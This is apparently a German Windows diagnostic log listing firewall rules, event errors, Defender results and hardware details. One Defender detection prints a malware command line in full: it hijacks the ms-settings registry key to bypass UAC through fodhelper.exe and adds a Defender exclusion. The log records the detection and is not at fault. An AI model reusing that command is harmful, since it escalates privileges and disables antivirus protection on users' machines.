FirewallRules: [TCP Query User{CFE90057-BCEA-40A0-AE51-739D95EE5092}C:\users\vincent\appdata\local\programs\opera gx\66.0.3515.111\opera.exe] => (Allow) C:\users\vincent\appdata\local\programs\opera gx\66.0.3515.111\opera.exe => Keine Datei
FirewallRules: [{EA2F1E39-6712-4C12-9D67-26F0DF53BDF9}] => (Allow) E:\Steam\steamapps\common\Tom Clancy's Rainbow Six Siege\RainbowSix_Vulkan.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft)
FirewallRules: [{8F4E3083-172F-4C97-AE3E-4511F2CC6685}] => (Allow) E:\Steam\steamapps\common\Tom Clancy's Rainbow Six Siege\RainbowSix_Vulkan.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft)
FirewallRules: [UDP Query User{49DD3D9C-1901-4C96-AD47-05FC38107620}C:\users\vincent\appdata\local\programs\opera gx\66.0.3515.75\opera.exe] => (Block) C:\users\vincent\appdata\local\programs\opera gx\66.0.3515.75\opera.exe => Keine Datei
FirewallRules: [TCP Query User{A0FF624F-5498-449F-8F18-9DF4347EF500}C:\users\vincent\appdata\local\programs\opera gx\66.0.3515.75\opera.exe] => (Block) C:\users\vincent\appdata\local\programs\opera gx\66.0.3515.75\opera.exe => Keine Datei
FirewallRules: [{B50C0665-9A28-41B0-A5EA-571FA2C10838}] => (Allow) E:\Steam\steamapps\common\GarrysMod\hl2.exe () [Datei ist nicht signiert]
FirewallRules: [{F3924350-8BD5-496B-BC41-69C9D3CEDF16}] => (Allow) E:\Steam\steamapps\common\GarrysMod\hl2.exe () [Datei ist nicht signiert]
FirewallRules: [UDP Query User{653AE7B7-6E8A-4772-ABD1-69599B2D09DA}E:\blizzard\overwatch\_retail_\overwatch.exe] => (Allow) E:\blizzard\overwatch\_retail_\overwatch.exe => Keine Datei
FirewallRules: [TCP Query User{BABDDC9D-DE4D-4CA8-8501-0FCC2A9533ED}E:\blizzard\overwatch\_retail_\overwatch.exe] => (Allow) E:\blizzard\overwatch\_retail_\overwatch.exe => Keine Datei
FirewallRules: [{C3870430-EA9B-4165-947C-34055AE7BB2A}] => (Allow) E:\Steam\steamapps\common\Bloons TD Battles\Battles-Win.exe () [Datei ist nicht signiert]
FirewallRules: [{030BE0D6-B32A-4BB9-B1CF-E9638E6BE7F3}] => (Allow) E:\Steam\steamapps\common\Bloons TD Battles\Battles-Win.exe () [Datei ist nicht signiert]
FirewallRules: [{152C34D8-BE01-420A-B064-F5FB94D50612}] => (Allow) D:\Anthem\Anthem\Anthem.exe (Electronic Arts, Inc. -> Electronic Arts)
FirewallRules: [{3B0CCABF-C677-4C58-9B93-1633B45CA5F3}] => (Allow) D:\Anthem\Anthem\Anthem.exe (Electronic Arts, Inc. -> Electronic Arts)
FirewallRules: [{6D5FF305-F38F-4487-932A-FC70AA3D0C40}] => (Allow) D:\Anthem\Anthem\AnthemTrial.exe (Electronic Arts, Inc. -> Electronic Arts)
FirewallRules: [{0AC2070C-3F95-464C-80F0-0B881F4C5D78}] => (Allow) D:\Anthem\Anthem\AnthemTrial.exe (Electronic Arts, Inc. -> Electronic Arts)
FirewallRules: [{878991CD-C715-4487-B53F-9229F25B2946}] => (Allow) E:\Steam\steamapps\common\狐の旅路\Game.exe (KADOKAWA) [Datei ist nicht signiert]
FirewallRules: [{E7F28D94-907D-4A63-9636-CABAB053D231}] => (Allow) E:\Steam\steamapps\common\狐の旅路\Game.exe (KADOKAWA) [Datei ist nicht signiert]
FirewallRules: [UDP Query User{5D9876C9-9E03-4927-BCB4-4BB638D0C5F3}C:\users\vincent\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\vincent\appdata\roaming\spotify\spotify.exe => Keine Datei
FirewallRules: [TCP Query User{4538A7B8-EBFC-4257-910F-C42BEE1C9AFC}C:\users\vincent\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\vincent\appdata\roaming\spotify\spotify.exe => Keine Datei
FirewallRules: [{096A800B-B0D8-4A04-BDEB-35650147920D}] => (Allow) E:\Steam\steamapps\common\Life Is Strange\Binaries\Win32\LifeIsStrange.exe => Keine Datei
FirewallRules: [{A9944F10-ADDD-4551-AC76-A65B03AF93FA}] => (Allow) E:\Steam\steamapps\common\Life Is Strange\Binaries\Win32\LifeIsStrange.exe => Keine Datei
FirewallRules: [{4290AA66-5B70-45D2-8754-A455817ECC1A}] => (Allow) E:\Titanfall\Titanfall2\Titanfall2_trial.exe => Keine Datei
FirewallRules: [{0418DBE6-91BF-41C4-A146-51AD62FA1B6F}] => (Allow) E:\Titanfall\Titanfall2\Titanfall2_trial.exe => Keine Datei
FirewallRules: [{E27D5C60-5867-405E-9898-1297F68846ED}] => (Allow) E:\Titanfall\Titanfall2\Titanfall2.exe => Keine Datei
FirewallRules: [{E46CAF76-8365-403F-8CCA-80B765937C59}] => (Allow) E:\Titanfall\Titanfall2\Titanfall2.exe => Keine Datei
FirewallRules: [UDP Query User{BA61DA4B-E097-4187-A1B3-4576B2FF86CA}E:\steam\steamapps\common\dead by daylight\deadbydaylight\binaries\win64\deadbydaylight-win64-shipping.exe] => (Allow) E:\steam\steamapps\common\dead by daylight\deadbydaylight\binaries\win64\deadbydaylight-win64-shipping.exe => Keine Datei
FirewallRules: [TCP Query User{45A41EF6-B90C-440E-B73B-DCEC2C300056}E:\steam\steamapps\common\dead by daylight\deadbydaylight\binaries\win64\deadbydaylight-win64-shipping.exe] => (Allow) E:\steam\steamapps\common\dead by daylight\deadbydaylight\binaries\win64\deadbydaylight-win64-shipping.exe => Keine Datei
FirewallRules: [{05876600-DE03-4400-8C18-E2FF7F8DFB1E}] => (Allow) E:\Steam\steamapps\common\Warframe\Tools\Launcher.exe => Keine Datei
FirewallRules: [{278DE2F2-E028-48A2-80E2-FEDDAFC28FB1}] => (Allow) E:\Steam\steamapps\common\Warframe\Tools\Launcher.exe => Keine Datei
FirewallRules: [UDP Query User{027A1EAD-C8D3-418E-A00B-7B52AA699394}E:\overwatch\overwatch\_retail_\overwatch.exe] => (Allow) E:\overwatch\overwatch\_retail_\overwatch.exe => Keine Datei
FirewallRules: [TCP Query User{3DE299EE-7B5B-460C-93AF-D2CBA5F3AF2C}E:\overwatch\overwatch\_retail_\overwatch.exe] => (Allow) E:\overwatch\overwatch\_retail_\overwatch.exe => Keine Datei
FirewallRules: [UDP Query User{F5608653-9B40-4701-88FD-100B73E9403A}D:\wintv8\wintv8\wintv8.exe] => (Allow) D:\wintv8\wintv8\wintv8.exe (Hauppauge Computer Works Inc. -> Hauppauge Computer Works, Inc.) [Datei ist nicht signiert]
FirewallRules: [TCP Query User{526947BC-B812-4C51-99FA-4A60CA3ED19C}D:\wintv8\wintv8\wintv8.exe] => (Allow) D:\wintv8\wintv8\wintv8.exe (Hauppauge Computer Works Inc. -> Hauppauge Computer Works, Inc.) [Datei ist nicht signiert]
FirewallRules: [UDP Query User{93C68686-2CB6-4577-8BC7-3E8F9B823CAC}E:\diablo iii\x64\diablo iii64.exe] => (Allow) E:\diablo iii\x64\diablo iii64.exe => Keine Datei
FirewallRules: [TCP Query User{75995366-9E52-45D2-9289-D6BF86F0C6DF}E:\diablo iii\x64\diablo iii64.exe] => (Allow) E:\diablo iii\x64\diablo iii64.exe => Keine Datei
FirewallRules: [TCP Query User{130259D6-E2A4-4429-9B59-ECB20FCB2AA5}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [UDP Query User{8A450321-B524-492C-902C-77D4B1564C85}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [{06AC1CED-FE59-4DF7-90C8-B400001E2A38}] => (Allow) E:\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{02F5B165-4217-4EFF-8E8D-83477830AC28}] => (Allow) E:\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{33D2E234-3DD2-4D9B-9F49-57B4D6987D1B}] => (Allow) E:\Steam\bin\cef\cef.win7\steamwebhelper.exe => Keine Datei
FirewallRules: [{FCFEB995-7034-4953-AD5A-59C6DA4AF7E6}] => (Allow) E:\Steam\bin\cef\cef.win7\steamwebhelper.exe => Keine Datei
FirewallRules: [TCP Query User{97C66B7E-E00B-40A2-99E8-2F46451A5F4F}E:\overwatch\overwatch\overwatch.exe] => (Block) E:\overwatch\overwatch\overwatch.exe => Keine Datei
FirewallRules: [UDP Query User{ADDCCCCD-6EF9-4684-9D8F-AEEACCD030EC}E:\overwatch\overwatch\overwatch.exe] => (Block) E:\overwatch\overwatch\overwatch.exe => Keine Datei
FirewallRules: [TCP Query User{92B36222-CF85-4E3B-B77A-1B421889E558}E:\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) E:\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe => Keine Datei
FirewallRules: [UDP Query User{5D9B96A1-0B5F-49FE-B34A-8C54A052671F}E:\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) E:\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe => Keine Datei
FirewallRules: [TCP Query User{1483B170-1BDE-452D-888E-8429224BF22C}C:\program files (x86)\overwatch test\overwatch.exe] => (Block) C:\program files (x86)\overwatch test\overwatch.exe => Keine Datei
FirewallRules: [UDP Query User{CE9DBE9F-FE1F-4507-84CF-241D1A14F0B8}C:\program files (x86)\overwatch test\overwatch.exe] => (Block) C:\program files (x86)\overwatch test\overwatch.exe => Keine Datei
FirewallRules: [{BC602CC9-6E07-4C53-97E5-F0971111970F}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{C3F27F2D-6989-48F2-866B-991A4DC17DC4}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [TCP Query User{87481E29-CA0A-4151-A3D1-F99C71778FB8}D:\plex media server\plex media server.exe] => (Allow) D:\plex media server\plex media server.exe (Plex, Inc -> Plex, Inc.)
FirewallRules: [UDP Query User{82523D6E-E906-4E71-9B06-A72BEF78D0B2}D:\plex media server\plex media server.exe] => (Allow) D:\plex media server\plex media server.exe (Plex, Inc -> Plex, Inc.)
FirewallRules: [TCP Query User{057EF7B5-10EA-41CA-A07E-D936B292BD9B}D:\plex media server\plex dlna server.exe] => (Allow) D:\plex media server\plex dlna server.exe (Plex, Inc -> Plex, Inc.)
FirewallRules: [UDP Query User{5F62BAE5-7CD5-448B-B6D3-AD16ADF30186}D:\plex media server\plex dlna server.exe] => (Allow) D:\plex media server\plex dlna server.exe (Plex, Inc -> Plex, Inc.)
FirewallRules: [TCP Query User{FC34C768-7EAD-4BEA-B5B7-C02AEE198F18}C:\program files (x86)\bluestacks\hd-player.exe] => (Allow) C:\program files (x86)\bluestacks\hd-player.exe => Keine Datei
FirewallRules: [UDP Query User{BD213B2A-7DE7-41A3-AA65-09025ED6DFA1}C:\program files (x86)\bluestacks\hd-player.exe] => (Allow) C:\program files (x86)\bluestacks\hd-player.exe => Keine Datei
FirewallRules: [TCP Query User{AE5307D5-5929-4D5A-99E3-3FE4615B59B1}D:\program files (x86)\myphoneexplorer\myphoneexplorer.exe] => (Allow) D:\program files (x86)\myphoneexplorer\myphoneexplorer.exe (Franz Josef Wechselberger -> F.J. Wechselberger)
FirewallRules: [UDP Query User{04143737-9CB5-4740-9923-25965FC933F7}D:\program files (x86)\myphoneexplorer\myphoneexplorer.exe] => (Allow) D:\program files (x86)\myphoneexplorer\myphoneexplorer.exe (Franz Josef Wechselberger -> F.J. Wechselberger)
FirewallRules: [TCP Query User{335D28D8-4C75-44C8-BD78-7E1A17EFAC60}C:\program files (x86)\destiny 2\destiny2.exe] => (Block) C:\program files (x86)\destiny 2\destiny2.exe => Keine Datei
FirewallRules: [UDP Query User{2F643029-1E60-47E9-AAE7-D79291091561}C:\program files (x86)\destiny 2\destiny2.exe] => (Block) C:\program files (x86)\destiny 2\destiny2.exe => Keine Datei
FirewallRules: [TCP Query User{2D074994-996A-4FF1-92DA-81553FFB54DD}C:\program files (x86)\synology\assistant\dsassistant.exe] => (Allow) C:\program files (x86)\synology\assistant\dsassistant.exe (Synology Inc. -> ) [Datei ist nicht signiert]
FirewallRules: [UDP Query User{6CA1D9CD-819C-4FDB-83E7-9010ECC0710A}C:\program files (x86)\synology\assistant\dsassistant.exe] => (Allow) C:\program files (x86)\synology\assistant\dsassistant.exe (Synology Inc. -> ) [Datei ist nicht signiert]
FirewallRules: [TCP Query User{9A6B212E-CA7C-4529-AFDF-E59032BC75BD}E:\epic games\unrealtournament\engine\binaries\win64\ue4-win64-shipping.exe] => (Block) E:\epic games\unrealtournament\engine\binaries\win64\ue4-win64-shipping.exe => Keine Datei
FirewallRules: [UDP Query User{5C628D85-721B-4B33-847F-F8E2BFEB0895}E:\epic games\unrealtournament\engine\binaries\win64\ue4-win64-shipping.exe] => (Block) E:\epic games\unrealtournament\engine\binaries\win64\ue4-win64-shipping.exe => Keine Datei
FirewallRules: [{92460299-B0C4-418C-9E30-35CF90DF66F7}] => (Allow) E:\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{EB4C3102-4B6F-4EF7-BE5C-62504D5E7730}] => (Allow) E:\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [TCP Query User{7F341781-5FCB-48AC-987A-82E3AFC54B37}D:\program files\sabnzbd\sabnzbd.exe] => (Allow) D:\program files\sabnzbd\sabnzbd.exe (The SABnzbd-team) [Datei ist nicht signiert]
FirewallRules: [UDP Query User{4A897FBC-7AD9-4F1F-97E8-112576AA8ACC}D:\program files\sabnzbd\sabnzbd.exe] => (Allow) D:\program files\sabnzbd\sabnzbd.exe (The SABnzbd-team) [Datei ist nicht signiert]
FirewallRules: [{59056172-75AC-49D6-84EA-11C525E39F71}] => (Allow) D:\Program Files\SABnzbd\SABnzbd.exe (The SABnzbd-team) [Datei ist nicht signiert]
FirewallRules: [{9943FCA0-3241-431A-A2FD-F4C64CC80D21}] => (Allow) C:\Program Files (x86)\StarMoney 12 Basic\ouservice\StarMoneyOnlineUpdate.exe (Star Finanz - Software Entwicklung und Vertriebs GmbH -> Star Finanz-Software Entwicklung und Vertriebs GmbH)
FirewallRules: [{7225D833-F83B-428A-8E8F-AA68DA438437}] => (Allow) C:\Program Files (x86)\StarMoney 12 Basic\ouservice\StarMoneyOnlineUpdate.exe (Star Finanz - Software Entwicklung und Vertriebs GmbH -> Star Finanz-Software Entwicklung und Vertriebs GmbH)
FirewallRules: [{4A733375-FD33-4FDA-AC25-B34D3106CE42}] => (Allow) C:\Program Files (x86)\StarMoney 12 Basic\app\StarMoney.exe (Star Finanz - Software Entwicklung und Vertriebs GmbH -> Star Finanz-Software Entwicklung und Vertriebs GmbH)
FirewallRules: [{FE1B7EE1-9AAE-499F-8D65-3F963AB71747}] => (Allow) C:\Program Files (x86)\StarMoney 12 Basic\app\StarMoney.exe (Star Finanz - Software Entwicklung und Vertriebs GmbH -> Star Finanz-Software Entwicklung und Vertriebs GmbH)
FirewallRules: [TCP Query User{C0E4811F-1315-44CE-925B-0F0DE359798F}C:\program files (x86)\overwatch league replay viewer\overwatch.exe] => (Allow) C:\program files (x86)\overwatch league replay viewer\overwatch.exe => Keine Datei
FirewallRules: [UDP Query User{E82A56D2-5A9B-4204-8AD9-9C9FF84FF448}C:\program files (x86)\overwatch league replay viewer\overwatch.exe] => (Allow) C:\program files (x86)\overwatch league replay viewer\overwatch.exe => Keine Datei
FirewallRules: [TCP Query User{133524D0-630F-4A87-A0DF-67184C829942}E:\destiny 2\destiny2.exe] => (Allow) E:\destiny 2\destiny2.exe => Keine Datei
FirewallRules: [UDP Query User{CF09EE33-CF54-4C7B-9769-4AAE8C43E3C8}E:\destiny 2\destiny2.exe] => (Allow) E:\destiny 2\destiny2.exe => Keine Datei
FirewallRules: [{4A4845DC-FB7B-4EA2-96DA-9BA5FB107EB0}] => (Allow) C:\Program Files (x86)\Origin Games\Command and Conquer Generals Zero Hour\Generals.exe (Kalloc Studios, Inc. -> Kalloc Studios) [Datei ist nicht signiert]
FirewallRules: [{0367493D-51B5-4A4E-8D8D-896CD5C5D555}] => (Allow) C:\Program Files (x86)\Origin Games\Command and Conquer Generals Zero Hour\Generals.exe (Kalloc Studios, Inc. -> Kalloc Studios) [Datei ist nicht signiert]
FirewallRules: [{F640C858-ADF7-43C4-880B-40AE87A6E4F6}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{684EE478-3EED-436D-997C-00C849CE4A66}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{B6C45732-5EC8-4AFE-9714-8FB8790869CD}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{9C336794-5583-46F4-868F-41C63707BD5F}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{7EE80D06-70E8-430C-89F3-3E5904D57162}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{D4DD4E03-A339-480A-906C-4ECE1B57815F}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{8DA22F59-7192-4F1D-B12B-DBF7DAD16F2E}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{BBC6F61C-54EE-4AFB-9B85-C0477FEAF35B}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{E957E06A-8D29-4115-8A1B-245C1B394D13}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.66.77.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{FC8AF37E-9F51-4B8D-921E-022022EAB3FE}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.66.77.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{02AC9F13-721D-4530-BC94-96A31822DEBF}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.66.77.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{6BE28DEB-BECD-401D-BDFD-2614A52F8A8A}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.66.77.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
==================== Wiederherstellungspunkte =========================
ACHTUNG: Systemwiederherstellung ist deaktiviert (Total:232.29 GB) (Free:90.88 GB) (39%)
Überprüfen Sie den "VSS" Dienst
==================== Fehlerhafte Geräte im Gerätemanager ============
Name: HP EWS
Description: HP EWS
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
Name: HP FAX
Description: HP FAX
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
==================== Fehlereinträge in der Ereignisanzeige: ========================
Applikationsfehler:
==================
Error: (12/02/2020 02:41:01 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest". Fehler in Manifest- oder Richtliniendatei "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" in Zeile 1.
Die im Manifest gefundene Komponenten-ID stimmt nicht mit der ID der angeforderten Komponente überein.
Verweis: UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition: UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Verwenden Sie das Programm "sxstrace.exe" für eine detaillierte Diagnose.
Error: (12/02/2020 02:40:55 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest". Fehler in Manifest- oder Richtliniendatei "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" in Zeile 1.
Die im Manifest gefundene Komponenten-ID stimmt nicht mit der ID der angeforderten Komponente überein.
Verweis: UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition: UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Verwenden Sie das Programm "sxstrace.exe" für eine detaillierte Diagnose.
Error: (12/02/2020 11:28:07 AM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Volume (I:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)
Error: (12/02/2020 11:28:02 AM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Zwi_Lager (H:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)
Error: (12/02/2020 11:27:47 AM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Daten (G:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)
Error: (12/02/2020 11:27:46 AM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Medien (F:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)
Error: (12/02/2020 11:27:42 AM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Spiele (E:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)
Error: (12/02/2020 11:27:29 AM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Programme (D:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)
Systemfehler:
=============
Error: (11/24/2020 06:26:45 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-HRMFF6U)
Description: Der Server "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
Error: (11/24/2020 06:26:45 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-HRMFF6U)
Description: Der Server "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
Error: (11/24/2020 10:54:11 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Mozilla Maintenance Service" wurde mit folgendem Fehler beendet:
Unzulässige Funktion.
Error: (11/23/2020 03:47:56 PM) (Source: disk) (EventID: 7) (User: )
Description: Fehlerhafter Block bei Gerät \Device\Harddisk2\DR4.
Error: (11/14/2020 03:18:38 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "HauppaugeTVServer" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 5000 Millisekunden durchgeführt: Neustart des Diensts.
Error: (11/10/2020 10:56:14 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: Der Dienst "Machine Debug Manager" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren.
Error: (11/10/2020 10:55:59 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Netzwerklistendienst" wurde mit folgendem Fehler beendet:
Das Gerät ist nicht bereit.
Error: (11/10/2020 10:55:59 AM) (Source: DCOM) (EventID: 10010) (User: NT-AUTORITÄT)
Description: Der Server "{A47979D2-C419-11D9-A5B4-001185AD2B89}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
Windows Defender:
===================================
Date: 2020-12-02 11:17:15.2310000Z
Description:
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {37BBC7C9-ECE9-436C-9C2F-12E32BAFC0D6}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM
Date: 2020-12-01 11:17:56.7110000Z
Description:
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {3B9EFD20-3A12-4BA9-B5A1-D926A6AD922F}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM
Date: 2020-11-30 11:41:00.5290000Z
Description:
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {88EDB4DB-6C6F-43CF-BCA4-B1F8BF02AFE5}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM
Date: 2020-11-28 10:50:40.9680000Z
Description:
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Sobocat.A&threatid=2147733729&enterprise=0
Name: Trojan:Win32/Sobocat.A
ID: 2147733729
Schweregrad: Schwerwiegend
Kategorie: Trojaner
Pfad: CmdLine:_C:\Windows\System32\cmd.exe /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /v DelegateExecute /d /t REG_SZ && reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /d cmd /c start /min WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\Windows\SysWOW64\WindowsPowerShell\v1.0" /t REG_SZ && %SystemRoot%\system32\fodhelper.exe & ping -n 7 127.0.0.1 > NUL & reg delete HKCU\Software\Classes\ms-settings\shell\open\command /f
Erkennungsursprung: Unbekannt
Erkennungstype: Konkret
Erkennungsquelle: System
Benutzer: NT-AUTORITÄT\SYSTEM
Prozessname: Unknown
Sicherheitsversion: AV: 1.327.1687.0, AS: 1.327.1687.0, NIS: 1.327.1687.0
Modulversion: AM: 1.1.17600.5, NIS: 1.1.17600.5
Date: 2020-11-27 11:27:18.0520000Z
Description:
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {E37C6F1B-AAD4-4BCD-95CD-DD4DA2C955F9}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM
CodeIntegrity:
===================================
Date: 2020-12-02 21:32:54.5040000Z
Description:
Windows blocked file \Device\HarddiskVolume11\Windows\System32\scrobj.dll which has been disallowed for protected processes.
Date: 2020-12-02 21:32:39.1240000Z
Description:
Windows blocked file \Device\HarddiskVolume11\Windows\System32\scrobj.dll which has been disallowed for protected processes.
Date: 2020-12-02 21:32:39.0420000Z
Description:
Windows blocked file \Device\HarddiskVolume11\Windows\System32\scrobj.dll which has been disallowed for protected processes.
==================== Speicherinformationen ===========================
BIOS: American Megatrends Inc. 0317 10/20/2016
Hauptplatine: ASUSTeK COMPUTER INC. PRIME H270-PRO
Prozessor: Intel(R) Core(TM) i5-7600 CPU @ 3.50GHz
Prozentuale Nutzung des RAM: 41%
Installierter physikalischer RAM: 16318.9 MB
Verfügbarer physikalischer RAM: 9606.65 MB
Summe virtueller Speicher: 18750.9 MB
Verfügbarer virtueller Speicher: 9621.1 MB
==================== Laufwerke ================================
Drive c: () (Fixed) (Total:232.29 GB) (Free:90.88 GB) NTFS
Drive d: (Programme) (Fixed) (Total:196.74 GB) (Free:83.74 GB) NTFS
Drive e: (Spiele) (Fixed) (Total:390.62 GB) (Free:92.32 GB) NTFS
Drive f: (Medien) (Fixed) (Total:1230.47 GB) (Free:105.66 GB) NTFS
Drive g: (Daten) (Fixed) (Total:195.31 GB) (Free:172.93 GB) NTFS
Drive h: (Zwi_Lager) (Fixed) (Total:390.62 GB) (Free:144.02 GB) NTFS
Drive i: (Volume) (Fixed) (Total:390.62 GB) (Free:59.39 GB) NTFS
